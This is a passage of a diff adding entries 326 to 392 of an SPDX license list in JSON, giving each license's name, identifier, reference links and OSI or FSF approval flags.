+ "seeAlso": [
+ "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0.json",
+ "referenceNumber": 326,
+ "name": "Creative Commons Attribution Non Commercial 3.0 Unported",
+ "licenseId": "CC-BY-NC-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.0.json",
+ "referenceNumber": 327,
+ "name": "Creative Commons Attribution Non Commercial 2.0 Generic",
+ "licenseId": "CC-BY-NC-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unlicense.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unlicense.json",
+ "referenceNumber": 328,
+ "name": "The Unlicense",
+ "licenseId": "Unlicense",
+ "seeAlso": [
+ "https://unlicense.org/"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPL-1.0.json",
+ "referenceNumber": 329,
+ "name": "Lucent Public License Version 1.0",
+ "licenseId": "LPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/LPL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/bzip2-1.0.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.5.json",
+ "referenceNumber": 330,
+ "name": "bzip2 and libbzip2 License v1.0.5",
+ "licenseId": "bzip2-1.0.5",
+ "seeAlso": [
+ "https://sourceware.org/bzip2/1.0.5/bzip2-manual-1.0.5.html",
+ "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Entessa.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Entessa.json",
+ "referenceNumber": 331,
+ "name": "Entessa Public License v1.0",
+ "licenseId": "Entessa",
+ "seeAlso": [
+ "https://opensource.org/licenses/Entessa"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-Patent.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Patent.json",
+ "referenceNumber": 332,
+ "name": "BSD-2-Clause Plus Patent License",
+ "licenseId": "BSD-2-Clause-Patent",
+ "seeAlso": [
+ "https://opensource.org/licenses/BSDplusPatent"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ECL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ECL-2.0.json",
+ "referenceNumber": 333,
+ "name": "Educational Community License v2.0",
+ "licenseId": "ECL-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/ECL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Crossword.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Crossword.json",
+ "referenceNumber": 334,
+ "name": "Crossword License",
+ "licenseId": "Crossword",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Crossword"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.json",
+ "referenceNumber": 335,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 1.0 Generic",
+ "licenseId": "CC-BY-NC-ND-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd-nc/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OCLC-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OCLC-2.0.json",
+ "referenceNumber": 336,
+ "name": "OCLC Research Public License 2.0",
+ "licenseId": "OCLC-2.0",
+ "seeAlso": [
+ "http://www.oclc.org/research/activities/software/license/v2final.htm",
+ "https://opensource.org/licenses/OCLC-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-1.1.json",
+ "referenceNumber": 337,
+ "name": "CeCILL Free Software License Agreement v1.1",
+ "licenseId": "CECILL-1.1",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V1.1-US.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-2.1.json",
+ "referenceNumber": 338,
+ "name": "CeCILL Free Software License Agreement v2.1",
+ "licenseId": "CECILL-2.1",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V2.1-en.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGDL-Taiwan-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGDL-Taiwan-1.0.json",
+ "referenceNumber": 339,
+ "name": "Taiwan Open Government Data License, version 1.0",
+ "licenseId": "OGDL-Taiwan-1.0",
+ "seeAlso": [
+ "https://data.gov.tw/license"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Abstyles.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Abstyles.json",
+ "referenceNumber": 340,
+ "name": "Abstyles License",
+ "licenseId": "Abstyles",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Abstyles"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/libselinux-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/libselinux-1.0.json",
+ "referenceNumber": 341,
+ "name": "libselinux public domain notice",
+ "licenseId": "libselinux-1.0",
+ "seeAlso": [
+ "https://github.com/SELinuxProject/selinux/blob/master/libselinux/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ANTLR-PD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ANTLR-PD.json",
+ "referenceNumber": 342,
+ "name": "ANTLR Software Rights Notice",
+ "licenseId": "ANTLR-PD",
+ "seeAlso": [
+ "http://www.antlr2.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-or-later.json",
+ "referenceNumber": 343,
+ "name": "GNU General Public License v2.0 or later",
+ "licenseId": "GPL-2.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/IPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IPL-1.0.json",
+ "referenceNumber": 344,
+ "name": "IBM Public License v1.0",
+ "licenseId": "IPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/IPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-enna.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-enna.json",
+ "referenceNumber": 345,
+ "name": "enna License",
+ "licenseId": "MIT-enna",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT#enna"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CPOL-1.02.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CPOL-1.02.json",
+ "referenceNumber": 346,
+ "name": "Code Project Open License 1.02",
+ "licenseId": "CPOL-1.02",
+ "seeAlso": [
+ "http://www.codeproject.com/info/cpol10.aspx"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.json",
+ "referenceNumber": 347,
+ "name": "Creative Commons Attribution Share Alike 3.0 Austria",
+ "licenseId": "CC-BY-SA-3.0-AT",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/3.0/at/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.json",
+ "referenceNumber": 348,
+ "name": "GNU General Public License v3.0 w/GCC Runtime Library exception",
+ "licenseId": "GPL-3.0-with-GCC-exception",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gcc-exception-3.1.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-1-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-1-Clause.json",
+ "referenceNumber": 349,
+ "name": "BSD 1-Clause License",
+ "licenseId": "BSD-1-Clause",
+ "seeAlso": [
+ "https://svnweb.freebsd.org/base/head/include/ifaddrs.h?revision\u003d326823"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NTP-0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NTP-0.json",
+ "referenceNumber": 350,
+ "name": "NTP No Attribution",
+ "licenseId": "NTP-0",
+ "seeAlso": [
+ "https://github.com/tytso/e2fsprogs/blob/master/lib/et/et_name.c"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SugarCRM-1.1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SugarCRM-1.1.3.json",
+ "referenceNumber": 351,
+ "name": "SugarCRM Public License v1.1.3",
+ "licenseId": "SugarCRM-1.1.3",
+ "seeAlso": [
+ "http://www.sugarcrm.com/crm/SPL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT.json",
+ "referenceNumber": 352,
+ "name": "MIT License",
+ "licenseId": "MIT",
+ "seeAlso": [
+ "https://opensource.org/licenses/MIT"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.1-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.1-RFN.json",
+ "referenceNumber": 353,
+ "name": "SIL Open Font License 1.1 with Reserved Font Name",
+ "licenseId": "OFL-1.1-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+ "https://opensource.org/licenses/OFL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Watcom-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Watcom-1.0.json",
+ "referenceNumber": 354,
+ "name": "Sybase Open Watcom Public License 1.0",
+ "licenseId": "Watcom-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Watcom-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.json",
+ "referenceNumber": 355,
+ "name": "Creative Commons Attribution-NonCommercial-ShareAlike 2.0 France",
+ "licenseId": "CC-BY-NC-SA-2.0-FR",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.0/fr/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ODbL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ODbL-1.0.json",
+ "referenceNumber": 356,
+ "name": "Open Data Commons Open Database License v1.0",
+ "licenseId": "ODbL-1.0",
+ "seeAlso": [
+ "http://www.opendatacommons.org/licenses/odbl/1.0/",
+ "https://opendatacommons.org/licenses/odbl/1-0/"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/FSFULLR.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FSFULLR.json",
+ "referenceNumber": 357,
+ "name": "FSF Unlimited License (with License Retention)",
+ "licenseId": "FSFULLR",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License#License_Retention_Variant"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.3.json",
+ "referenceNumber": 358,
+ "name": "Open LDAP Public License v1.3",
+ "licenseId": "OLDAP-1.3",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003de5f8117f0ce088d0bd7a8e18ddf37eaa40eb09b1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SSH-OpenSSH.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SSH-OpenSSH.json",
+ "referenceNumber": 359,
+ "name": "SSH OpenSSH license",
+ "licenseId": "SSH-OpenSSH",
+ "seeAlso": [
+ "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/LICENCE#L10"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause.json",
+ "referenceNumber": 360,
+ "name": "BSD 2-Clause \"Simplified\" License",
+ "licenseId": "BSD-2-Clause",
+ "seeAlso": [
+ "https://opensource.org/licenses/BSD-2-Clause"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/HPND.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HPND.json",
+ "referenceNumber": 361,
+ "name": "Historical Permission Notice and Disclaimer",
+ "licenseId": "HPND",
+ "seeAlso": [
+ "https://opensource.org/licenses/HPND"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zimbra-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zimbra-1.3.json",
+ "referenceNumber": 362,
+ "name": "Zimbra Public License v1.3",
+ "licenseId": "Zimbra-1.3",
+ "seeAlso": [
+ "http://web.archive.org/web/20100302225219/http://www.zimbra.com/license/zimbra-public-license-1-3.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Borceux.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Borceux.json",
+ "referenceNumber": 363,
+ "name": "Borceux license",
+ "licenseId": "Borceux",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Borceux"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.1.json",
+ "referenceNumber": 364,
+ "name": "Open LDAP Public License v1.1",
+ "licenseId": "OLDAP-1.1",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d806557a5ad59804ef3a44d5abfbe91d706b0791f"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.0.json",
+ "referenceNumber": 365,
+ "name": "SIL Open Font License 1.0",
+ "licenseId": "OFL-1.0",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NASA-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NASA-1.3.json",
+ "referenceNumber": 366,
+ "name": "NASA Open Source Agreement 1.3",
+ "licenseId": "NASA-1.3",
+ "seeAlso": [
+ "http://ti.arc.nasa.gov/opensource/nosa/",
+ "https://opensource.org/licenses/NASA-1.3"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/VOSTROM.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/VOSTROM.json",
+ "referenceNumber": 367,
+ "name": "VOSTROM Public License for Open Source",
+ "licenseId": "VOSTROM",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/VOSTROM"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-0.json",
+ "referenceNumber": 368,
+ "name": "MIT No Attribution",
+ "licenseId": "MIT-0",
+ "seeAlso": [
+ "https://github.com/aws/mit-0",
+ "https://romanrm.net/mit-zero",
+ "https://github.com/awsdocs/aws-cloud9-user-guide/blob/master/LICENSE-SAMPLECODE"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ISC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ISC.json",
+ "referenceNumber": 369,
+ "name": "ISC License",
+ "licenseId": "ISC",
+ "seeAlso": [
+ "https://www.isc.org/licenses/",
+ "https://www.isc.org/downloads/software-support-policy/isc-license/",
+ "https://opensource.org/licenses/ISC"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Unicode-DFS-2016.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2016.json",
+ "referenceNumber": 370,
+ "name": "Unicode License Agreement - Data Files and Software (2016)",
+ "licenseId": "Unicode-DFS-2016",
+ "seeAlso": [
+ "http://www.unicode.org/copyright.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BlueOak-1.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BlueOak-1.0.0.json",
+ "referenceNumber": 371,
+ "name": "Blue Oak Model License 1.0.0",
+ "licenseId": "BlueOak-1.0.0",
+ "seeAlso": [
+ "https://blueoakcouncil.org/license/1.0.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.json",
+ "referenceNumber": 372,
+ "name": "Licence Libre du Québec – Réciprocité forte version 1.1",
+ "licenseId": "LiLiQ-Rplus-1.1",
+ "seeAlso": [
+ "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-forte-liliq-r-v1-1/",
+ "http://opensource.org/licenses/LiLiQ-Rplus-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NOSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NOSL.json",
+ "referenceNumber": 373,
+ "name": "Netizen Open Source License",
+ "licenseId": "NOSL",
+ "seeAlso": [
+ "http://bits.netizen.com.au/licenses/NOSL/nosl.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SMLNJ.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SMLNJ.json",
+ "referenceNumber": 374,
+ "name": "Standard ML of New Jersey License",
+ "licenseId": "SMLNJ",
+ "seeAlso": [
+ "https://www.smlnj.org/license.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0+.json",
+ "referenceNumber": 375,
+ "name": "GNU Lesser General Public License v3.0 or later",
+ "licenseId": "LGPL-3.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CPAL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CPAL-1.0.json",
+ "referenceNumber": 376,
+ "name": "Common Public Attribution License 1.0",
+ "licenseId": "CPAL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/CPAL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/PSF-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PSF-2.0.json",
+ "referenceNumber": 377,
+ "name": "Python Software Foundation License 2.0",
+ "licenseId": "PSF-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Python-2.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/RPL-1.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RPL-1.5.json",
+ "referenceNumber": 378,
+ "name": "Reciprocal Public License 1.5",
+ "licenseId": "RPL-1.5",
+ "seeAlso": [
+ "https://opensource.org/licenses/RPL-1.5"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.json",
+ "referenceNumber": 379,
+ "name": "BSD 2-Clause FreeBSD License",
+ "licenseId": "BSD-2-Clause-FreeBSD",
+ "seeAlso": [
+ "http://www.freebsd.org/copyright/freebsd-license.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-Modern-Variant.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-Modern-Variant.json",
+ "referenceNumber": 380,
+ "name": "MIT License Modern Variant",
+ "licenseId": "MIT-Modern-Variant",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:MIT#Modern_Variants",
+ "https://ptolemy.berkeley.edu/copyright.htm",
+ "https://pirlwww.lpl.arizona.edu/resources/guide/software/PerlTk/Tixlic.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Nokia.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Nokia.json",
+ "referenceNumber": 381,
+ "name": "Nokia Open Source License",
+ "licenseId": "Nokia",
+ "seeAlso": [
+ "https://opensource.org/licenses/nokia"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.json",
+ "referenceNumber": 382,
+ "name": "GNU Free Documentation License v1.1 only - no invariants",
+ "licenseId": "GFDL-1.1-no-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PDDL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PDDL-1.0.json",
+ "referenceNumber": 383,
+ "name": "Open Data Commons Public Domain Dedication \u0026 License 1.0",
+ "licenseId": "PDDL-1.0",
+ "seeAlso": [
+ "http://opendatacommons.org/licenses/pddl/1.0/",
+ "https://opendatacommons.org/licenses/pddl/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUPL-1.0.json",
+ "referenceNumber": 384,
+ "name": "European Union Public License 1.0",
+ "licenseId": "EUPL-1.0",
+ "seeAlso": [
+ "http://ec.europa.eu/idabc/en/document/7330.html",
+ "http://ec.europa.eu/idabc/servlets/Doc027f.pdf?id\u003d31096"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDDL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDDL-1.1.json",
+ "referenceNumber": 385,
+ "name": "Common Development and Distribution License 1.1",
+ "licenseId": "CDDL-1.1",
+ "seeAlso": [
+ "http://glassfish.java.net/public/CDDL+GPL_1_1.html",
+ "https://javaee.github.io/glassfish/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-only.json",
+ "referenceNumber": 386,
+ "name": "GNU Free Documentation License v1.3 only",
+ "licenseId": "GFDL-1.3-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.6.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.6.json",
+ "referenceNumber": 387,
+ "name": "Open LDAP Public License v2.6",
+ "licenseId": "OLDAP-2.6",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d1cae062821881f41b73012ba816434897abf4205"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/JSON.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/JSON.json",
+ "referenceNumber": 388,
+ "name": "JSON License",
+ "licenseId": "JSON",
+ "seeAlso": [
+ "http://www.json.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-or-later.json",
+ "referenceNumber": 389,
+ "name": "GNU Lesser General Public License v3.0 or later",
+ "licenseId": "LGPL-3.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0.json",
+ "referenceNumber": 390,
+ "name": "GNU General Public License v3.0 only",
+ "licenseId": "GPL-3.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Fair.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Fair.json",
+ "referenceNumber": 391,
+ "name": "Fair License",
+ "licenseId": "Fair",
+ "seeAlso": [
+ "http://fairlicense.org/",
+ "https://opensource.org/licenses/Fair"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-font-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-font-exception.json",
+ "referenceNumber": 392,
+ "name": "GNU General Public License v2.0 w/Font exception",
